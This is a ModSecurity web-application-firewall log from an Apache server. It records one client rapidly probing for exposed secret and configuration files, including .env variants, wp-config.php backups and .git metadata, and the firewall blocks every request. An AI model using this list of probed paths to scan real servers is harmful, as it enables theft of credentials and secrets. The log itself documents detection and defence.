[Mon May 11 15:23:06.854030 2026] [security2:error] [pid 1319886:tid 1319934] [client 195.178.110.133:45866] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYOqy-5-wpj6Sx56aYiwAAABY"]
[Mon May 11 15:23:06.854085 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:45954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYOqy-5-wpj6Sx56aYigAAAAE"]
[Mon May 11 15:23:06.854166 2026] [security2:error] [pid 1319886:tid 1319934] [client 195.178.110.133:45866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYOqy-5-wpj6Sx56aYiwAAABY"]
[Mon May 11 15:23:06.854278 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:45954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYOqy-5-wpj6Sx56aYigAAAAE"]
[Mon May 11 15:23:06.854367 2026] [security2:error] [pid 1319886:tid 1319934] [client 195.178.110.133:45866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYOqy-5-wpj6Sx56aYiwAAABY"]
[Mon May 11 15:23:06.854411 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:45810] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYOuSQ-m-m0ukSShuBowAAAUk"]
[Mon May 11 15:23:06.854537 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:45810] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYOuSQ-m-m0ukSShuBowAAAUk"]
[Mon May 11 15:23:06.854754 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:45810] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYOuSQ-m-m0ukSShuBowAAAUk"]
[Mon May 11 15:23:06.855336 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:45850] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYOuSQ-m-m0ukSShuBpAAAAVg"]
[Mon May 11 15:23:06.855449 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:45850] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYOuSQ-m-m0ukSShuBpAAAAVg"]
[Mon May 11 15:23:06.855603 2026] [security2:error] [pid 1319885:tid 1319932] [client 195.178.110.133:45794] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYOlchVQ3tCn0m9OpY6wAAARY"]
[Mon May 11 15:23:06.855620 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:45850] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYOuSQ-m-m0ukSShuBpAAAAVg"]
[Mon May 11 15:23:06.855721 2026] [security2:error] [pid 1319885:tid 1319932] [client 195.178.110.133:45794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYOlchVQ3tCn0m9OpY6wAAARY"]
[Mon May 11 15:23:06.855910 2026] [security2:error] [pid 1319885:tid 1319932] [client 195.178.110.133:45794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYOlchVQ3tCn0m9OpY6wAAARY"]
[Mon May 11 15:23:06.865173 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYOlchVQ3tCn0m9OpY7AAAAQU"]
[Mon May 11 15:23:06.865290 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYOlchVQ3tCn0m9OpY7AAAAQU"]
[Mon May 11 15:23:06.865469 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYOlchVQ3tCn0m9OpY7AAAAQU"]
[Mon May 11 15:23:06.866279 2026] [security2:error] [pid 1320398:tid 1320422] [client 195.178.110.133:45896] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYOuJEyNRN152ArOSMkwAAAFY"]
[Mon May 11 15:23:06.866395 2026] [security2:error] [pid 1320398:tid 1320422] [client 195.178.110.133:45896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYOuJEyNRN152ArOSMkwAAAFY"]
[Mon May 11 15:23:06.866574 2026] [security2:error] [pid 1320398:tid 1320422] [client 195.178.110.133:45896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYOuJEyNRN152ArOSMkwAAAFY"]
[Mon May 11 15:23:06.866813 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYOqO9RdIr1DwxYR2SjQAAANU"]
[Mon May 11 15:23:06.866922 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYOqO9RdIr1DwxYR2SjQAAANU"]
[Mon May 11 15:23:06.867110 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYOqO9RdIr1DwxYR2SjQAAANU"]
[Mon May 11 15:23:06.867559 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:45874] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYOuSQ-m-m0ukSShuBpQAAAVI"]
[Mon May 11 15:23:06.867678 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:45874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYOuSQ-m-m0ukSShuBpQAAAVI"]
[Mon May 11 15:23:06.867856 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:45874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYOuSQ-m-m0ukSShuBpQAAAVI"]
[Mon May 11 15:23:06.868475 2026] [security2:error] [pid 1320674:tid 1320693] [client 195.178.110.133:45838] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SjgAAAMM"]
[Mon May 11 15:23:06.868590 2026] [security2:error] [pid 1320674:tid 1320693] [client 195.178.110.133:45838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SjgAAAMM"]
[Mon May 11 15:23:06.868796 2026] [security2:error] [pid 1320674:tid 1320693] [client 195.178.110.133:45838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SjgAAAMM"]
[Mon May 11 15:23:06.869030 2026] [security2:error] [pid 1320674:tid 1320692] [client 195.178.110.133:45918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SjwAAAMI"]
[Mon May 11 15:23:06.869080 2026] [security2:error] [pid 1319885:tid 1319888] [client 195.178.110.133:45928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYOlchVQ3tCn0m9OpY7QAAAQA"]
[Mon May 11 15:23:06.869143 2026] [security2:error] [pid 1320674:tid 1320692] [client 195.178.110.133:45918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SjwAAAMI"]
[Mon May 11 15:23:06.869204 2026] [security2:error] [pid 1319885:tid 1319888] [client 195.178.110.133:45928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYOlchVQ3tCn0m9OpY7QAAAQA"]
[Mon May 11 15:23:06.869275 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:45886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYOuJEyNRN152ArOSMlQAAAEc"]
[Mon May 11 15:23:06.869344 2026] [security2:error] [pid 1320674:tid 1320692] [client 195.178.110.133:45918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SjwAAAMI"]
[Mon May 11 15:23:06.869380 2026] [security2:error] [pid 1319885:tid 1319888] [client 195.178.110.133:45928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYOlchVQ3tCn0m9OpY7QAAAQA"]
[Mon May 11 15:23:06.869383 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:45886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYOuJEyNRN152ArOSMlQAAAEc"]
[Mon May 11 15:23:06.869559 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:45886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYOuJEyNRN152ArOSMlQAAAEc"]
[Mon May 11 15:23:06.869630 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:45826] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYOqt2WtvoFr7xvGzUKwAAAIM"]
